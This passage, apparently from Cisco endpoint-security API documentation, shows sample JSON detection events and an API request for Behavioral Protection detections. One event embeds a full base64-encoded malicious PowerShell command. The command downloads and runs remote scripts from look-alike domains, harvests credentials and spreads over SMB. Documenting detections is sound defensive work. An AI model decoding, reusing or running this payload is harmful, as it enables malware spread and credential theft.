        "hostname": "Demo_AMP_Threat_Audit",
        "external_ip": "149.20.236.110",
        "user": "johndoe",
        "active": true,
        "network_addresses": [
          {
            "ip": "237.160.117.93",
            "mac": "b9:f4:70:d0:30:68"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v1/computers/d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
          "trajectory": "https://api.eu.amp.cisco.com/v1/computers/d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca/trajectory",
          "group": "https://api.eu.amp.cisco.com/v1/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "ekjrngjker.exe",
        "file_path": "C:\\ekjrngjker.exe",
        "identity": {
          "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
          "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
          "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
        }
      },
      "tactics": [
        "TA0042"
      ],
      "techniques": [
        "T1204.003"
      ]
    }
  ]
}

Fetch list of Behavioral Protection Detection events

Request

Requires Authorization 
GET /v1/events?event_type%5B%5D=553648222&limit=2
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED

cURL Edit, then copy and paste on your terminal

curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.eu.amp.cisco.com/v1/events?event_type%5B%5D=553648222&limit=2'

Response

Shortened for readability 

content-type: application/json
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 878
strict-transport-security: max-age=31536000; includeSubDomains, max-age=31536000
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2812
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"51b90207b21d55b4579b29a3c4cacdb6"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2022-03-18T11:55:11Z

{
  "version": "v1.2.0",
  "metadata": {
    "links": {
      "self": "https://api.eu.amp.cisco.com/v1/events?event_type%5B%5D=553648222&limit=2",
      "next": "https://api.eu.amp.cisco.com/v1/events?event_type%5B%5D=553648222&limit=2&offset=2"
    },
    "results": {
      "total": 32,
      "current_item_count": 2,
      "index": 0,
      "items_per_page": 2
    }
  },
  "data": [
    {
      "id": 6880683125978957000,
      "timestamp": 1647533684,
      "timestamp_nanoseconds": 810000000,
      "date": "2022-03-17T16:14:44+00:00",
      "event_type": "Threat Detection",
      "event_type_id": 553648222,
      "detection": "WMIPRVSE Launched Encoded Powershell Command",
      "connector_guid": "f3185c52-4903-41da-a833-04a534460eb3",
      "group_guids": [
        "3aef61ae-a41f-4a89-a47d-1ce96164eea8"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "f3185c52-4903-41da-a833-04a534460eb3",
        "hostname": "Demo_BP_WMIPRVSE",
        "external_ip": "234.38.52.99",
        "active": true,
        "network_addresses": [
          {
            "ip": "157.184.70.94",
            "mac": "67:71:7f:26:b1:5f"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v1/computers/f3185c52-4903-41da-a833-04a534460eb3",
          "trajectory": "https://api.eu.amp.cisco.com/v1/computers/f3185c52-4903-41da-a833-04a534460eb3/trajectory",
          "group": "https://api.eu.amp.cisco.com/v1/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
        }
      },
      "tactics": [
        "TA0002",
        "TA0005"
      ],
      "bp_data": {
        "audit": false,
        "details": {
          "actions": [
            {
              "action": "end_process",
              "end_ts": 1602033881808,
              "params": [
                "10724"
              ],
              "start_ts": 1602033881805,
              "status": "success"
            }
          ],
          "eng_epoch": 1,
          "eng_ver": "0.9.0.104",
          "matched_activity": {
            "events": [
              {
                "process:start": {
                  "app": "powershell.exe",
                  "app_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
                  "args": [
                    "powershell.exe",
                    "-NoP"
                  ],
                  "cmd_line": "powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==",
                  "parent_app": "WmiPrvSE.exe",
                  "parent_app_path": "C:\\Windows\\System32\\wbem",
                  "parent_pid": 2236,
                  "parent_puid": 132461352663910600,
                  "parent_user": "SYSTEM",
                  "parent_user_sid": "010100000000000512000000",
                  "pid": 10724,
                  "puid": 132465072105597400,
                  "ts": 1602033881727175700,
                  "user": "SYSTEM",
                  "user_sid": "010100000000000512000000"
                }
              }
            ],
            "limited": false,
            "matched": 1
          },
          "schema": "endpoint",
          "schema_epoch": 2,
          "sig_id": 20190517123456,
          "sig_rev": 5
        },
        "detection": "apde:20190517123456",
        "end_ts": 1647533684,
        "engine": "apde",
        "id": "d2616Ab846",
        "name": "WMIPRVSE Launched Encoded Powershell Command",
        "observables": {
          "file": [
            {
              "md5": "a575a7610e5f003cc36df39e07c4ba7d",
